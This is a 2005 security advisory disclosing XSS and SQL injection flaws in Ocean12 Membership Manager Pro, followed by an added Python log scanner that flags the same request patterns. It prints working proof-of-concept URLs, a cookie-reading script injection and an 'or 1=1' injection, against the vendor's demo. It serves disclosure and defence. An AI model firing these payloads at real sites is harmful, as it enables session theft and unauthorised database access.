Ocean12 Membership Manager Pro has XSS and SQL injection vulnerabilities rated high risk. The vendor has not responded to contact.
`Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho's Security Advisory
Title: Ocean12 Membership Manager Pro : XSS and Sql injection
Risk: High
Date: 5/04/2005
Vendor: http://www.ocean12scripts.com
"A membership manager application designed to allow a website owner
to easily add password protected areas to their website"
XSS
http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
SQL INJECTION
http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=0 or 1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
The vendor was contacted more than a month ago. No response has been received.
Author:
Zinho is webmaster and founder of http://www.hackerscenter.com ,
Security research portal
zinho-no-spam @ hackerscenter.com
`
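A defensive check for the two request patterns in the advisory, added here as an example and not part of the advisory or the vendor's code: it scans IIS W3C-format log lines for main.asp requests whose UserID, page or DisplayNumber is not a plain integer, or whose decoded values carry HTML metacharacters. The log field layout, the sample lines and the assumption that those three parameters are integers are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: these main.asp parameters are integers in normal use.
NUMERIC_PARAMS = ("UserID", "page", "DisplayNumber")
MARKUP = re.compile(r"[<>\"']")

def audit_query(query):
    """Return findings for one raw (still percent-encoded) query string."""
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,9}", value):
                findings.append(f"{name}: expected an integer, got {value!r}")
            if MARKUP.search(value):
                findings.append(f"{name}: HTML metacharacters after decoding")
    return findings

def scan_w3c_log(lines, page="/main.asp"):
    """Yield (client IP, findings) for suspicious requests to the page."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for following rows
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith(page):
            continue
        findings = audit_query(row.get("cs-uri-query", "-"))
        if findings:
            hits.append((row.get("c-ip"), findings))
    return hits

# Constructed sample log; the query strings mirror the advisory's URLs.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-04-05 10:00:01 192.0.2.10 GET /products/membership/demo/main.asp UserID=2&page=1&Sort=Name&DisplayNumber=10 200
2005-04-05 10:02:13 192.0.2.44 GET /products/membership/demo/main.asp UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10 200
2005-04-05 10:03:40 192.0.2.44 GET /products/membership/demo/main.asp UserID=0+or+1=1&page=1&Sort=Name&DisplayNumber=10 200
""".splitlines()

if __name__ == "__main__":
    for ip, findings in scan_w3c_log(SAMPLE_LOG):
        print(ip, findings)
```

The same integer check applied server-side before UserID reaches a query, together with HTML-encoding of page on output, addresses both issues at the source.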